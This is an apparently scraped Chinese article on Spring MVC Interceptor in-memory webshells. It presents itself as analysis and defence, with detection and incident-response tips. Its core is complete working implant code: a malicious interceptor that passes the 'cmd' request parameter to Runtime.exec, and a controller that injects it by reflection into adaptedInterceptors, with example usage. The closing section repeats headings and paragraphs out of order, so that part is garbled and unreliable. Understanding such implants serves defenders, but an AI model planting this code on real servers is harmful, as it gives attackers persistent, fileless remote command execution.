Spring Interceptor 内存马技术分析与防御指南<\/h1>

一、Spring Interceptor 基础概念<\/h2>

1.1 什么是 Spring Interceptor？<\/h3>
Spring Interceptor 是 Spring MVC 框架提供的拦截机制，用于在请求处理的特定阶段执行自定义逻辑。它类似于 Servlet 的 Filter，但作用于更上层的 MVC 流程中，由 Spring 容器管理。<\/p>

1.2 核心接口：HandlerInterceptor<\/h3>

开发者需要实现 org.springframework.web.servlet.HandlerInterceptor<\/code> 接口，重写以下三个关键方法：<\/p>

preHandle() 方法<\/strong><\/p>

boolean<\/span> preHandle<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response,<\/span> Object handler)<\/span>
<\/span><\/span><\/code><\/pre>
在控制器方法执行前调用<\/li>
返回值为 boolean 类型：

true<\/code>: 继续执行后续的拦截器和控制器方法<\/li>
false<\/code>: 中断流程，不再执行后续操作<\/li>
<\/ul>
<\/li>
典型应用：权限校验、日志记录、参数预处理<\/li>
<\/ul>
postHandle() 方法<\/strong><\/p>
void<\/span> postHandle<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response,<\/span> 
<\/span><\/span>                Object handler,<\/span> ModelAndView modelAndView)<\/span>
<\/span><\/span><\/code><\/pre>
在控制器方法执行完毕后，视图渲染前调用<\/li>
可对 ModelAndView 对象进行修改或添加数据<\/li>
<\/ul>
afterCompletion() 方法<\/strong><\/p>
void<\/span> afterCompletion<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response,<\/span> 
<\/span><\/span>                     Object handler,<\/span> Exception ex)<\/span>
<\/span><\/span><\/code><\/pre>
在整个请求完成后（包括视图渲染）调用<\/li>
主要用于资源清理工作，无论是否发生异常都会执行<\/li>
<\/ul>
1.3 正常注册与使用<\/h3>
通过实现 WebMvcConfigurer<\/code> 接口注册拦截器：<\/p>
@Configuration<\/span>
<\/span><\/span>public<\/span> class<\/span> WebConfig<\/span> implements<\/span> WebMvcConfigurer {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> addInterceptors<\/span>(<\/span>InterceptorRegistry registry)<\/span> {<\/span>
<\/span><\/span>        registry.<\/span>addInterceptor<\/span>(<\/span>new<\/span> MyCustomInterceptor())<\/span>
<\/span><\/span>                .<\/span>addPathPatterns<\/span>(<\/span>"\/api\/**"<\/span>)<\/span>      \/\/ 拦截路径
<\/span><\/span><\/span><\/span>                .<\/span>excludePathPatterns<\/span>(<\/span>"\/api\/public\/**"<\/span>);<\/span> \/\/ 排除路径
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>二、Interceptor 内存马攻击原理<\/h2>
2.1 攻击核心机制<\/h3>
关键组件分析<\/h4>

AbstractHandlerMapping<\/strong>：Spring MVC 中处理请求映射的核心类<\/li>
adaptedInterceptors<\/strong>：protected final 字段，存储所有注册的拦截器<\/li>
HandlerExecutionChain<\/strong>：每个请求的处理执行链<\/li>
<\/ol>
攻击流程分析<\/h4>
DispatcherServlet → getHandler() 
               → mapping.getHandler() 
               → getHandlerExecutionChain() 
               → 遍历 adaptedInterceptors 把每个 interceptor 加入 chain
<\/code><\/pre>
2.2 关键代码分析<\/h3>
getHandlerExecutionChain() 方法<\/strong><\/p>
protected<\/span> HandlerExecutionChain getHandlerExecutionChain<\/span>(<\/span>Object handler,<\/span> 
<\/span><\/span>                                                        HttpServletRequest request)<\/span> {<\/span>
<\/span><\/span>    HandlerExecutionChain chain =<\/span> ...;<\/span>
<\/span><\/span>    
<\/span><\/span>    for<\/span> (<\/span>HandlerInterceptor interceptor :<\/span> this<\/span>.<\/span>adaptedInterceptors<\/span>)<\/span> {<\/span>
<\/span><\/span>        if<\/span> (<\/span>interceptor instanceof<\/span> MappedInterceptor)<\/span> {<\/span>
<\/span><\/span>            MappedInterceptor mappedInterceptor =<\/span> (<\/span>MappedInterceptor)<\/span>interceptor;<\/span>
<\/span><\/span>            if<\/span> (<\/span>mappedInterceptor.<\/span>matches<\/span>(<\/span>request))<\/span> {<\/span>
<\/span><\/span>                chain.<\/span>addInterceptor<\/span>(<\/span>mappedInterceptor.<\/span>getInterceptor<\/span>());<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span> else<\/span> {<\/span>
<\/span><\/span>            chain.<\/span>addInterceptor<\/span>(<\/span>interceptor);<\/span>  \/\/ 关键注入点
<\/span><\/span><\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> chain;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.3 内存马注入必要条件<\/h3>

持久化监听<\/strong>：必须参与每一次请求处理<\/li>
进入 HandlerExecutionChain<\/strong>：恶意拦截器必须出现在处理链中<\/li>
注入 adaptedInterceptors<\/strong>：必须修改全局拦截器列表<\/li>
获取 RequestMappingHandlerMapping 实例<\/strong>：从 Spring 容器中获取正在运行的实例<\/li>
<\/ol>
三、内存马完整实现代码<\/h2>
3.1 恶意拦截器实现<\/h3>
public<\/span> static<\/span> class<\/span> MaliciousInterceptor<\/span> implements<\/span> HandlerInterceptor {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> boolean<\/span> preHandle<\/span>(<\/span>HttpServletRequest request,<\/span> 
<\/span><\/span>                           HttpServletResponse response,<\/span> Object handler)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        String cmd =<\/span> request.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>        if<\/span> (<\/span>cmd !=<\/span> null<\/span> &&<\/span> !<\/span>cmd.<\/span>isEmpty<\/span>())<\/span> {<\/span>
<\/span><\/span>            \/\/ 命令执行逻辑
<\/span><\/span><\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> HandlerInterceptor.<\/span>super<\/span>.<\/span>preHandle<\/span>(<\/span>request,<\/span> response,<\/span> handler);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2 注入控制器<\/h3>
@RestController<\/span>
<\/span><\/span>public<\/span> class<\/span> InterceptorShell<\/span> {<\/span>
<\/span><\/span>    
<\/span><\/span>    @RequestMapping<\/span>(<\/span>"\/inject"<\/span>)<\/span>
<\/span><\/span>    public<\/span> String inject<\/span>()<\/span> {<\/span>
<\/span><\/span>        \/\/ 1. 获取 WebApplicationContext
<\/span><\/span><\/span><\/span>        WebApplicationContext context =<\/span> (<\/span>WebApplicationContext)<\/span> 
<\/span><\/span>            RequestContextHolder.<\/span>currentRequestAttributes<\/span>()<\/span>
<\/span><\/span>                .<\/span>getAttribute<\/span>(<\/span>"org.springframework.web.servlet.DispatcherServlet.CONTEXT"<\/span>,<\/span> 0<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 2. 获取 RequestMappingHandlerMapping 实例
<\/span><\/span><\/span><\/span>        RequestMappingHandlerMapping rmhm =<\/span> context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            \/\/ 3. 反射访问 adaptedInterceptors 字段
<\/span><\/span><\/span><\/span>            Field field =<\/span> AbstractHandlerMapping.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"adaptedInterceptors"<\/span>);<\/span>
<\/span><\/span>            field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 4. 获取并修改拦截器列表
<\/span><\/span><\/span><\/span>            List<<\/span>HandlerInterceptor><\/span> interceptors =<\/span> 
<\/span><\/span>                (<\/span>List<<\/span>HandlerInterceptor>)<\/span> field.<\/span>get<\/span>(<\/span>rmhm);<\/span>
<\/span><\/span>            interceptors.<\/span>add<\/span>(<\/span>new<\/span> MaliciousInterceptor());<\/span>
<\/span><\/span>            
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>NoSuchFieldException |<\/span> IllegalAccessException e)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        
<\/span><\/span>        return<\/span> "inject success"<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>四、攻击执行流程详解<\/h2>
4.1 注入阶段<\/h3>

漏洞触发<\/strong>：通过反序列化、SpEL 注入等方式获得代码执行权限<\/li>
上下文获取<\/strong>：利用 RequestContextHolder<\/code> 获取当前请求的 WebApplicationContext<\/li>
Bean 获取<\/strong>：从容器中获取 RequestMappingHandlerMapping<\/code> 实例<\/li>
反射修改<\/strong>：通过反射将恶意拦截器添加到 adaptedInterceptors<\/code> 列表<\/li>
<\/ol>
4.2 命令执行阶段<\/h3>

用户请求<\/strong>：访问任意路径并携带命令参数（如 \/index.html?cmd=whoami<\/code>）<\/li>
拦截器触发<\/strong>：

DispatcherServlet.doDispatch()<\/code> 处理请求<\/li>
创建 HandlerExecutionChain<\/code> 时包含恶意拦截器<\/li>
applyPreHandle()<\/code> 调用恶意拦截器的 preHandle<\/code> 方法<\/li>
<\/ul>
<\/li>
命令执行<\/strong>：通过 Runtime.exec()<\/code> 执行系统命令<\/li>
<\/ol>
五、检测与防御方案<\/h2>
5.1 检测方法<\/h3>
静态检测<\/strong><\/p>
\/\/ 检查 adaptedInterceptors 中的可疑拦截器
<\/span><\/span><\/span><\/span>public<\/span> void<\/span> checkInterceptors<\/span>()<\/span> {<\/span>
<\/span><\/span>    RequestMappingHandlerMapping rmhm =<\/span> ...;<\/span>
<\/span><\/span>    Field field =<\/span> AbstractHandlerMapping.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"adaptedInterceptors"<\/span>);<\/span>
<\/span><\/span>    field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    List<<\/span>HandlerInterceptor><\/span> interceptors =<\/span> (<\/span>List<<\/span>HandlerInterceptor>)<\/span> field.<\/span>get<\/span>(<\/span>rmhm);<\/span>
<\/span><\/span>    
<\/span><\/span>    for<\/span> (<\/span>HandlerInterceptor interceptor :<\/span> interceptors)<\/span> {<\/span>
<\/span><\/span>        if<\/span> (<\/span>interceptor.<\/span>getClass<\/span>().<\/span>getName<\/span>().<\/span>contains<\/span>(<\/span>"Malicious"<\/span>))<\/span> {<\/span>
<\/span><\/span>            \/\/ 发现可疑拦截器
<\/span><\/span><\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>动态监控<\/strong><\/p>

监控 Runtime.exec() 等敏感方法的调用栈<\/li>
检查拦截器列表中新增的未知拦截器<\/li>
<\/ul>
5.2 防御措施<\/h3>
代码层面<\/strong><\/p>

输入验证<\/strong>：严格校验所有用户输入<\/li>
安全编码<\/strong>：避免使用危险的反射操作<\/li>
权限控制<\/strong>：限制敏感方法的访问权限<\/li>
<\/ol>
配置层面<\/strong><\/p>

安全加固<\/strong>：禁用不必要的反射功能<\/li>
监控告警<\/strong>：部署 RASP 进行运行时保护<\/li>
定期审计<\/strong>：检查拦截器配置和代码变更<\/li>
<\/ol>
5.3 应急响应<\/h3>

立即隔离<\/strong>：断开受影响系统的网络连接<\/li>
内存分析<\/strong>：使用内存分析工具检测恶意代码<\/li>
清除恢复<\/strong>：重启服务并修复安全漏洞<\/li>
溯源分析<\/strong>：确定攻击入口和影响范围<\/li>
<\/ol>
六、总结<\/h2>
Spring Interceptor 内存马是一种危害性极大的持久化攻击技术，攻击者通过反射机制修改 Spring MVC 的核心组件，实现无文件落地的远程命令执行。理解其工作原理对于安全防护至关重要，安全团队应加强对此类攻击的检测和防御能力。<\/p>
关键防护要点：<\/p>

严格控制反射操作的使用<\/li>
加强运行时安全监控<\/li>
定期进行安全代码审计<\/li>
建立完善的安全应急响应机制<\/li>
<\/ul>

Spring Interceptor 内存马技术分析与防御指南<\/h1>

一、Spring Interceptor 基础概念<\/h2>

1.1 什么是 Spring Interceptor？<\/h3> Spring Interceptor 是 Spring MVC 框架提供的拦截机制，用于在请求处理的特定阶段执行自定义逻辑。它类似于 Servlet 的 Filter，但作用于更上层的 MVC 流程中，由 Spring 容器管理。<\/p>

二、Interceptor 内存马攻击原理<\/h2>

2.1 攻击核心机制<\/h3>

三、内存马完整实现代码<\/h2>

四、攻击执行流程详解<\/h2>

五、检测与防御方案<\/h2>

1.1 什么是 Spring Interceptor？<\/h3>
Spring Interceptor 是 Spring MVC 框架提供的拦截机制，用于在请求处理的特定阶段执行自定义逻辑。它类似于 Servlet 的 Filter，但作用于更上层的 MVC 流程中，由 Spring 容器管理。<\/p>